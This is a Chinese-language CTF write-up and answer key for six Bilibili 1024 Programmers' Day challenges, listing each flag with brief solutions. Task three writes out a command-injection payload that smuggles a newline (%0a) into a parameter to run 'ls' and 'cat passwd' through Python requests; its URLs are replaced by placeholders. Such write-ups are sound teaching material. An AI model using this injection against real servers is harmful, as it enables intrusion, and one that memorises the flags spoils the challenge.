加入1024程序员节,投稿&参赛赢万元奖励,解锁神秘彩蛋!
第一题(安全攻防):a1cd5f84-27966146-3776f301-64031bb9
解析:
加密方式:AES 加密
加密模式:ECB
填充方式:无影响,都可以
Key:happy_1024_2233
密文:e9ca6f21583a1533d3ff4fd47ddc463c6a1c7d2cf084d364 0408abca7deabb96a58f50471171b60e02b1a8dbd32db156
解密结果(flag):a1cd5f84-27966146-3776f301-64031bb9
第二题(安全攻防):36c7a7b4-cda04af0-8db0368d-b5166480
解析:打开网址网页链接,进入开发者模式,在源代码选项里找到webpack://src/view/home.vue文件,第27行就是flag。
第三题(安全攻防):9d3c3014-6c6267e7-086aaee5-1f18452a
解析:
在git里下载 eval.php,可以看到正则表达式 ,这个可以用结尾接换行符匹配,然后换行用 Linux 命令。
使用根目录命令 ls 一下,向 网页链接[]=1%0a&args[]=ls 发送 GET 请求:import requests url = "网页链接[]=1%0a&args[]=ls"
response = requests.get(url=url)
print(response.text)
返回内容:
1.txt
passwd
data
config
flag 在 passwd 里,直接使用 Linux 命令 cat passwd,向 网页链接[]=1%0a&args[]=cat&args[]=passwd 发送 GET 请求:
import requests
url = "网页链接[]=1%0a&args[]=cat&args[]=passwd"
response = requests.get(url=url)
print(response.text)
∴flag:9d3c3014-6c6267e7-086aaee5-1f18452a
第四题(安全攻防):3d5dd579-0678ef93-18b70cae-cabc5d51
解析:抓包,获取flag
第五题(破解逆向):516834cc-50e448af-bcf9ed53-9ae4328e
解析:用JADX读代码,得到以下内容:
username: 516834cc-50e448af
password: bcf9ed53-9ae4328e
∴flag:516834cc-50e448af-bcf9ed53-9ae4328e
第六题(破解逆向):b13981f4-5ae996d4-bc04be5b-34662a78
解析:
与第五题类似,第六题需要逆向 SO,需验证 ABI和系统版本,修改 build.prop,ro.product.cpu.abi 为 x86,ro.build.version.release 为 9,然后再创建 /data/2233,4 byte 一组就会变成 flag:b13981f4-5ae996d4-bc04be5b-34662a78
摘自@JoeJoe5专栏B站1024程序节 网络攻防改编